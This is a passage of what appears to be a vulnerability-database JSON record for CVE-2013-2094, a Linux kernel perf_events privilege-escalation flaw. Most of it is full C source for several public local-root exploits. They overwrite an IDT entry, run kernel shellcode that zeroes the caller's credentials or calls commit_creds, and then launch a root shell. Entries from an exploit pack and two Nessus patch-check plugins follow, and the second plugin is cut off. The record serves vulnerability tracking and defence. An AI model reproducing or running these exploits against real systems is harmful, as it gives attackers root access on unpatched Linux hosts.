*cred = (uint32_t*) p[0];\r\n\r\n\t\tif ((p[0] != p[1]) || ((p[0]>>36) != kbase))\r\n\t\t\tcontinue;\r\n\r\n\t\tfor (j = 0; j < 20; j++) {\r\n\t\t\tif (cred[j] == uid && cred[j + 1] == gid) {\r\n\t\t\t\tfor (i = 0; i < 8; i++) {\r\n\t\t\t\t\tcred[j + i] = 0;\r\n\t\t\t\t\treturn;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\r\nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)\r\n{\r\n\tvoid *p;\r\n\r\n\tp = memmem(sc, 900, &needle, sizeof(needle));\r\n\tif (!p)\r\n\t\terrx(1, "can't find %x", needle);\r\n\r\n\tmemcpy(p, &val, sizeof(val));\r\n}\r\n\r\nstatic void *map_mem(uint64_t addr)\r\n{\r\n\tvoid *p;\r\n\r\n\tp = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,\r\n\t\t MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);\r\n\r\n\tif (p == MAP_FAILED)\r\n\t\terr(1, "mmap()");\r\n\r\n\treturn p;\r\n}\r\n\r\nstatic int find_mem(void *mem, uint8_t c)\r\n{\r\n\tint i;\r\n\tuint8_t *p = mem;\r\n\r\n\tfor (i = 0; i < SIZE; i++) {\r\n\t\tif (p[i] == c)\r\n\t\t\treturn i;\r\n\t}\r\n\r\n\treturn -1;\r\n}\r\n\r\nstatic void dropshell()\r\n{\r\n\tif (setuid(0) != 0)\r\n\t\terrx(1, "failed");\r\n\r\n\tprintf("Launching shell\\n");\r\n\r\n\texecl("/bin/sh", "sh", NULL);\r\n\texit(0);\r\n}\r\n\r\nvoid morte(int x)\r\n{\r\n\tprintf("Got signal\\n");\r\n\tclose(_fd);\r\n\tdropshell();\r\n}\r\n\r\nstatic void trigger(int intr)\r\n{\r\n\tswitch (intr) {\r\n\tcase 0:\r\n\t\tdo {\r\n\t\t\tint z = 1;\r\n\t\t\tint a = 1;\r\n\r\n\t\t\tz--;\r\n\r\n\t\t\ta /= z;\r\n\t\t} while (0);\r\n\t\tbreak;\r\n\r\n\tcase 4:\r\n\t\tasm("int $4");\r\n\t\tbreak;\r\n\r\n\tcase 0x80:\r\n\t\tasm("int $0x80");\r\n\t\tbreak;\r\n\r\n\tdefault:\r\n\t\terrx(1, "unknown intr %d", intr);\r\n\t}\r\n\r\n\tsleep(3);\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tuint32_t *p[2];\r\n\tint fd, i;\r\n\tuint64_t off;\r\n\tuint64_t addr = BASE;\r\n\tstruct idt idt;\r\n\tuint8_t *kbase;\r\n\tint sz = 4;\r\n\tint intr = 4;\r\n\r\n\tprintf("Searchin...\\n");\r\n\r\n\tp[0] = map_mem(BASE);\r\n\tp[1] = map_mem(BASE_JUMP);\r\n\r\n\tmemset(p[1], 0x69, SIZE);\r\n\r\n\toff = 0xFFFFFFFFL;\r\n\tfd = perf_open(off);\r\n\tclose(fd);\r\n\r\n\ti = find_mem(p[0], 0xff);\r\n\tif (i == -1) {\r\n\t\ti = find_mem(p[1], 0x68);\r\n\r\n\t\tif (i == -1)\r\n\t\t\terrx(1, "Can't find overwrite");\r\n\r\n\t\tsz = 24;\r\n\t\taddr = BASE_JUMP;\r\n\t\tprintf("detected CONFIG_JUMP_LABEL\\n");\r\n\t}\r\n\r\n\tmunmap(p[0], SIZE);\r\n\tmunmap(p[1], SIZE);\r\n\r\n\taddr += i;\r\n\taddr -= off * sz;\r\n\r\n\tprintf("perf_swevent_enabled is at 0x%lx\\n", addr);\r\n\r\n\tasm("sidt %0" : "=m" (idt));\r\n\r\n\tprintf("IDT at 0x%lx\\n", idt.addr);\r\n\r\n\toff = addr - idt.addr;\r\n\toff -= 8;\r\n\r\n\tswitch (off % sz) {\r\n\tcase 0:\r\n\t\tintr = 0;\r\n\t\tbreak;\r\n\r\n\tcase 8:\r\n\t\tintr = 0x80;\r\n\t\tbreak;\r\n\r\n\tcase 16:\r\n\t\tintr = 4;\r\n\t\tbreak;\r\n\r\n\tdefault:\r\n\t\terrx(1, "remainder %d", off % sz);\r\n\t}\r\n\r\n\tprintf("Using interrupt %d\\n", intr);\r\n\r\n\toff -= 16 * intr;\r\n\r\n\tassert((off % sz) == 0);\r\n\r\n\toff /= sz;\r\n\toff = -off;\r\n\r\n//\tprintf("Offset %lx\\n", off);\r\n\r\n\tkbase = (uint8_t*) (idt.addr & 0xFF000000);\r\n\r\n\tprintf("Shellcode at %p\\n", kbase);\r\n\r\n\tif (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,\r\n\t MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)\r\n\t\terr(1, "mmap()");\r\n\r\n\tmemset(kbase, 0x90, KSIZE);\r\n\tkbase += KSIZE - 1024;\r\n\r\n\ti = __sc_next - __sc_start;\r\n\tmemcpy(kbase, __sc_start, i);\r\n\tkbase += i;\r\n\tmemcpy(kbase, sc, 900);\r\n\r\n\tsc_replace(kbase, TMP(1), getuid());\r\n\tsc_replace(kbase, TMP(2), getgid());\r\n\r\n\tsignal(SIGALRM, morte);\r\n\talarm(2);\r\n\r\n\tprintf("Triggering sploit\\n");\r\n\t_fd = perf_open(off);\r\n\r\n\ttrigger(intr);\r\n\r\n\texit(0);\r\n}\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-79777"}], "canvas": [{"lastseen": "2019-05-29T19:48:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "description": "**Name**| perf_swevent_init \n---|--- \n**CVE**| CVE-2013-2094 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| perf_swevent_init local root \n**Notes**| Repeatability: Infinite \nNotes: \n \nTested on: \n\\- Ubuntu 12.10 quantal x86_64 3.5.0-27-generic \n \n \nVENDOR: GNU/Linux \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2094 \nCVE Name: CVE-2013-2094 \n\n", "edition": 2, "modified": "2013-05-14T20:55:00", "published": "2013-05-14T20:55:00", "id": "PERF_SWEVENT_INIT", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/perf_swevent_init", "type": "canvas", "title": "Immunity Canvas: PERF_SWEVENT_INIT", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:33", "description": "", "published": "2013-06-11T00:00:00", "type": "packetstorm", "title": "Linux perf_swevent_init Local Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2013-06-11T00:00:00", "id": "PACKETSTORM:121976", "href": "https://packetstormsecurity.com/files/121976/Linux-perf_swevent_init-Local-Root.html", "sourceData": "`/* \n* CVE-2013-2094 exploit x86_64 Linux < 3.8.9 \n* by sorbo (sorbo@darkircop.org) June 2013 \n* \n* Based on sd's exploit. Supports more targets. \n* \n*/ \n \n#define _GNU_SOURCE \n#include <string.h> \n#include <stdio.h> \n#include <unistd.h> \n#include <stdlib.h> \n#include <stdint.h> \n#include <sys/syscall.h> \n#include <sys/mman.h> \n#include <linux/perf_event.h> \n#include <signal.h> \n#include <assert.h> \n \n#define BASE 0x380000000 \n#define BASE_JUMP 0x1780000000 \n#define SIZE 0x10000000 \n#define KSIZE 0x2000000 \n \n#define TMP(x) (0xdeadbeef + (x)) \n \nstruct idt { \nuint16_t limit; \nuint64_t addr; \n} __attribute__((packed)); \n \nstatic int _fd; \n \nstatic int perf_open(uint64_t off) \n{ \nstruct perf_event_attr attr; \nint rc; \n \n// printf(\"perf open %lx [%d]\\n\", off, (int) off); \n \nmemset(&attr, 0, sizeof(attr)); \n \nattr.type = PERF_TYPE_SOFTWARE; \nattr.size = sizeof(attr); \nattr.config = off; \nattr.mmap = 1; \nattr.comm = 1; \nattr.exclude_kernel = 1; \n \nrc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0); \n \nreturn rc; \n} \n \nvoid __sc_start(void); \nvoid __sc_next(void); \n \nvoid __sc(void) \n{ \nasm(\"__sc_start:\\n\" \n\"call __sc_next\\n\" \n\"iretq\\n\" \n\"__sc_next:\\n\"); \n} \n \nvoid sc(void) \n{ \nint i, j; \nuint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192)); \nuint64_t kbase = ((uint64_t)current) >> 36; \nint uid = TMP(1); \nint gid = TMP(2); \n \nfor (i = 0; i < 4000; i += 4) { \nuint64_t *p = (void *) \u00a4t[i]; \nuint32_t *cred = (uint32_t*) p[0]; \n \nif ((p[0] != p[1]) || ((p[0]>>36) != kbase)) \ncontinue; \n \nfor (j = 0; j < 20; j++) { \nif (cred[j] == uid && cred[j + 1] == gid) { \nfor (i = 0; i < 8; i++) { \ncred[j + i] = 0; \nreturn; \n} \n} \n} \n} \n} \n \nstatic void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val) \n{ \nvoid *p; \n \np = memmem(sc, 900, &needle, sizeof(needle)); \nif (!p) \nerrx(1, \"can't find %x\", needle); \n \nmemcpy(p, &val, sizeof(val)); \n} \n \nstatic void *map_mem(uint64_t addr) \n{ \nvoid *p; \n \np = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE, \nMAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); \n \nif (p == MAP_FAILED) \nerr(1, \"mmap()\"); \n \nreturn p; \n} \n \nstatic int find_mem(void *mem, uint8_t c) \n{ \nint i; \nuint8_t *p = mem; \n \nfor (i = 0; i < SIZE; i++) { \nif (p[i] == c) \nreturn i; \n} \n \nreturn -1; \n} \n \nstatic void dropshell() \n{ \nif (setuid(0) != 0) \nerrx(1, \"failed\"); \n \nprintf(\"Launching shell\\n\"); \n \nexecl(\"/bin/sh\", \"sh\", NULL); \nexit(0); \n} \n \nvoid morte(int x) \n{ \nprintf(\"Got signal\\n\"); \nclose(_fd); \ndropshell(); \n} \n \nstatic void trigger(int intr) \n{ \nswitch (intr) { \ncase 0: \ndo { \nint z = 1; \nint a = 1; \n \nz--; \n \na /= z; \n} while (0); \nbreak; \n \ncase 4: \nasm(\"int $4\"); \nbreak; \n \ncase 0x80: \nasm(\"int $0x80\"); \nbreak; \n \ndefault: \nerrx(1, \"unknown intr %d\", intr); \n} \n \nsleep(3); \n} \n \nint main(int argc, char *argv[]) \n{ \nuint32_t *p[2]; \nint fd, i; \nuint64_t off; \nuint64_t addr = BASE; \nstruct idt idt; \nuint8_t *kbase; \nint sz = 4; \nint intr = 4; \n \nprintf(\"Searchin...\\n\"); \n \np[0] = map_mem(BASE); \np[1] = map_mem(BASE_JUMP); \n \nmemset(p[1], 0x69, SIZE); \n \noff = 0xFFFFFFFFL; \nfd = perf_open(off); \nclose(fd); \n \ni = find_mem(p[0], 0xff); \nif (i == -1) { \ni = find_mem(p[1], 0x68); \n \nif (i == -1) \nerrx(1, \"Can't find overwrite\"); \n \nsz = 24; \naddr = BASE_JUMP; \nprintf(\"detected CONFIG_JUMP_LABEL\\n\"); \n} \n \nmunmap(p[0], SIZE); \nmunmap(p[1], SIZE); \n \naddr += i; \naddr -= off * sz; \n \nprintf(\"perf_swevent_enabled is at 0x%lx\\n\", addr); \n \nasm(\"sidt %0\" : \"=m\" (idt)); \n \nprintf(\"IDT at 0x%lx\\n\", idt.addr); \n \noff = addr - idt.addr; \noff -= 8; \n \nswitch (off % sz) { \ncase 0: \nintr = 0; \nbreak; \n \ncase 8: \nintr = 0x80; \nbreak; \n \ncase 16: \nintr = 4; \nbreak; \n \ndefault: \nerrx(1, \"remainder %d\", off % sz); \n} \n \nprintf(\"Using interrupt %d\\n\", intr); \n \noff -= 16 * intr; \n \nassert((off % sz) == 0); \n \noff /= sz; \noff = -off; \n \n// printf(\"Offset %lx\\n\", off); \n \nkbase = (uint8_t*) (idt.addr & 0xFF000000); \n \nprintf(\"Shellcode at %p\\n\", kbase); \n \nif (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC, \nMAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED) \nerr(1, \"mmap()\"); \n \nmemset(kbase, 0x90, KSIZE); \nkbase += KSIZE - 1024; \n \ni = __sc_next - __sc_start; \nmemcpy(kbase, __sc_start, i); \nkbase += i; \nmemcpy(kbase, sc, 900); \n \nsc_replace(kbase, TMP(1), getuid()); \nsc_replace(kbase, TMP(2), getgid()); \n \nsignal(SIGALRM, morte); \nalarm(2); \n \nprintf(\"Triggering sploit\\n\"); \n_fd = perf_open(off); \n \ntrigger(intr); \n \nexit(0); \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121976/sorbolinux-exec.txt"}, {"lastseen": "2016-12-05T22:23:30", "description": "", "published": "2014-06-02T00:00:00", "type": "packetstorm", "title": "Ubuntu 12.04 3.x x86_64 perf_swevent_init Local Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2094"], "modified": "2014-06-02T00:00:00", "id": "PACKETSTORM:126880", "href": "https://packetstormsecurity.com/files/126880/Ubuntu-12.04-3.x-x86_64-perf_swevent_init-Local-Root.html", "sourceData": "`/** \n* Ubuntu 12.04 3.x x86_64 perf_swevent_init Local root exploit \n* by Vitaly Nikolenko (vnik5287@gmail.com) \n* \n* based on semtex.c by sd \n* \n* Supported targets: \n* [0] Ubuntu 12.04.0 - 3.2.0-23-generic \n* [1] Ubuntu 12.04.1 - 3.2.0-29-generic \n* [2] Ubuntu 12.04.2 - 3.5.0-23-generic \n* \n* $ gcc vnik.c -O2 -o vnik \n* \n* $ uname -r \n* 3.2.0-23-generic \n* \n* $ ./vnik 0 \n*/ \n \n#define _GNU_SOURCE 1 \n#include <stdint.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <sys/mman.h> \n#include <syscall.h> \n#include <stdint.h> \n#include <assert.h> \n \n#define BASE 0x1780000000 \n#define SIZE 0x0010000000 \n#define KSIZE 0x2000000 \n#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) \n \ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(unsigned long cred); \n \nuint64_t targets[3][3] = \n{{0xffffffff81ef67e0, // perf_swevent_enabled \n0xffffffff81091630, // commit_creds \n0xffffffff810918e0}, // prepare_kernel_cred \n{0xffffffff81ef67a0, \n0xffffffff81091220, \n0xffffffff810914d0}, \n{0xffffffff81ef5940, \n0xffffffff8107ee30, \n0xffffffff8107f0c0} \n}; \n \nvoid __attribute__((regparm(3))) payload() { \nuint32_t *fixptr = (void*)AB(1); \n// restore the handler \n*fixptr = -1; \ncommit_creds_fn commit_creds = (commit_creds_fn)AB(2); \nprepare_kernel_cred_fn prepare_kernel_cred = (prepare_kernel_cred_fn)AB(3); \ncommit_creds(prepare_kernel_cred((uint64_t)NULL)); \n} \n \nvoid trigger(uint32_t off) { \nuint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 }; \nint fd = syscall(298, buf, 0, -1, -1, 0); \nassert( !close(fd) ); \n} \n \nint main(int argc, char **argv) { \nuint64_t off64, needle, kbase, *p; \nuint8_t *code; \nuint32_t int_n, j = 5, target = 1337; \nint offset = 0; \nvoid *map; \n \nassert(argc == 2 && \"target?\"); \nassert( (target = atoi(argv[1])) < 3 ); \n \nstruct { \nuint16_t limit; \nuint64_t addr; \n} __attribute__((packed)) idt; \n \n// mmap user-space block so we don't page fault \n// on sw_perf_event_destroy \nassert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); \nmemset(map, 0, SIZE); \n \nasm volatile(\"sidt %0\" : \"=m\" (idt)); \nkbase = idt.addr & 0xff000000; \nprintf(\"IDT addr = 0x%lx\\n\", idt.addr); \n \nassert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); \nmemset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &payload, 1024); \nmemcpy(code-13,\"\\x0f\\x01\\xf8\\xe8\\5\\0\\0\\0\\x0f\\x01\\xf8\\x48\\xcf\", 13); \n \n// can only play with interrupts 3, 4 and 0x80 \nfor (int_n = 3; int_n <= 0x80; int_n++) { \nfor (off64 = 0x00000000ffffffff; (int)off64 < 0; off64--) { \nint off32 = off64; \n \nif ((targets[target][0] + ((uint64_t)off32)*24) == (idt.addr + int_n*16 + 8)) { \noffset = off32; \ngoto out; \n} \n} \nif (int_n == 4) { \n// shit, let's try 0x80 if the kernel is compiled with \n// CONFIG_IA32_EMULATION \nint_n = 0x80 - 1; \n} \n} \nout: \nassert(offset); \nprintf(\"Using int = %d with offset = %d\\n\", int_n, offset); \n \nfor (j = 0; j < 3; j++) { \nneedle = AB(j+1); \nassert(p = memmem(code, 1024, &needle, 8)); \n*p = !j ? (idt.addr + int_n * 16 + 8) : targets[target][j]; \n} \ntrigger(offset); \nswitch (int_n) { \ncase 3: \nasm volatile(\"int $0x03\"); \nbreak; \ncase 4: \nasm volatile(\"int $0x04\"); \nbreak; \ncase 0x80: \nasm volatile(\"int $0x80\"); \n} \n \nassert(!setuid(0)); \nreturn execl(\"/bin/bash\", \"-sh\", NULL); \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126880/ubuntuperfswevent-exec.txt"}], "nessus": [{"lastseen": "2021-01-01T06:39:37", "description": "An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-05-16T00:00:00", "title": "Ubuntu 12.10 : linux vulnerability (USN-1826-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic"], "id": "UBUNTU_USN-1826-1.NASL", "href": "https://www.tenable.com/plugins/nessus/66469", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1826-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66469);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"USN\", value:\"1826-1\");\n\n script_name(english:\"Ubuntu 12.10 : linux vulnerability (USN-1826-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1826-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.5-generic and / or\nlinux-image-3.5-highbank packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1826-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-30-generic\", pkgver:\"3.5.0-30.51\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-30-highbank\", pkgver:\"3.5.0-30.51\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic / linux-image-3.5-highbank\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:36", "description": "An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2013-05-16T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerability (USN-1825-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1825-1.NASL", "href": "https://www.tenable.com/plugins/nessus/66468", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1825-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66468);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-2094\");\n script_xref(name:\"USN\", value:\"1825-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerability (USN-1825-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An flaw was discovered in the Linux kernel's perf_events interface. A\nlocal user could exploit this flaw to escalate privileges on the\nsystem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1825-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2094\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1825-1\");\n }\n else\n {\n _ubuntu_report = 